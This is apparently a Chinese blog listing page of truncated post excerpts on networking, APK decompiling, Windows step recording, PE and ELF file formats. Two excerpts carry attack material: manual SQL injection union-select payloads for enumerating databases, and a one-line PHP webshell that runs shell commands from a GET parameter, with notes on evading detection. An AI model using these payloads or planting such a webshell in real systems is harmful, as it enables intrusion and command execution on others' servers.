摘要:
术语 工作组:工作组是局域网中的一个概念,他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理,将不同的computer按照不同的要求分类到不同的组 域:用来描述一种架构,和“工作组”相对应,由工作组升级而来的高级架构,域 (Domain)是一个有安全边界的计算机集合( 安全边界,意思是在两 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(79)
评论(0)
推荐(0)
摘要:
Linux下反编译Android apk文件 工具 反编译过程中需要用到三个工具:apktool、dex2jar和jd-Gui。 apktool:反编译出apk所需要的资源文件和布局设置文件。 dex2jar:反编译出jar文件,即apk的源程序字节码 jd-GUI:查看dex2jar反编译出来的j 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(90)
评论(0)
推荐(0)
摘要:
windows截屏 PSR(Problem Steps Recorder),直译为问题步骤记录器,在Windows 早期的系统中,采用WER(Windows Error Reporting)来收集系统的错误报告,但这些报告往往包含的信息太少以致于无法解决实际问题。 为此,微软从Windows 7系统 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(118)
评论(0)
推荐(0)
摘要:
sql手工注入 mysql #当前数据库库名,用户名 union select database(), user() #找所有数据库库名 select+schema_name+from+information_schema.schemata limit 1,1; #找一个数据库库中有哪些表名 sel 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(79)
评论(0)
推荐(0)
摘要:
webshell php <?php echo shell_exec($_GET['cmd']);?> 中国菜刀 可能被IDS WAF AV 扫描器 查杀 WeBoCoo(Web Backdoor Cookie)-->php 类终端shell 通信使用cookie传输 `服务端生成` webacoo 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(55)
评论(0)
推荐(0)
摘要:
一、引言 PE头结构定义 --> winint.h PE头结构有64bits与32bits之分,一般在名称上会表现出来 64bits与32bits头结构基本一致,只是进行简单扩展 基地址 相对虚拟地址 文件偏移地址 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(27)
评论(0)
推荐(0)
摘要:
三、块(节) PE文件到内存的映射 windows不会将文件全部加载至内存,采用类似内存映射文件机制 一般,会处理以下内容: 内存页属性 节的偏移地址 节的尺寸 不进行映射的节 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(17)
评论(0)
推荐(0)
摘要:
区块表与区块 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(33)
评论(0)
推荐(0)
摘要:
二、 MS-DOS头部 PE文件头部第一个字节起始于一个传统的MS-DOS头部,IMAGE-DOS-IHEADER struct _IMAGE_DOS_IHEADER{ 0X00 WORD e_magic; // MAGIC DOS sigture MZ(4Dh 5Ah) dos可执行文件 //.. 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(16)
评论(0)
推荐(0)
摘要:
ELF文件解析(二):ELF header详解 转载:https://www.cnblogs.com/jiqingwu/p/elf_explore_2.html 上一篇讲了ELF文件的总体布局,以及section和segment的概念。按照计划,今天继续讲 ELF header。 讲新的内容之前,先 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(42)
评论(0)
推荐(0)
浙公网安备 33010602011771号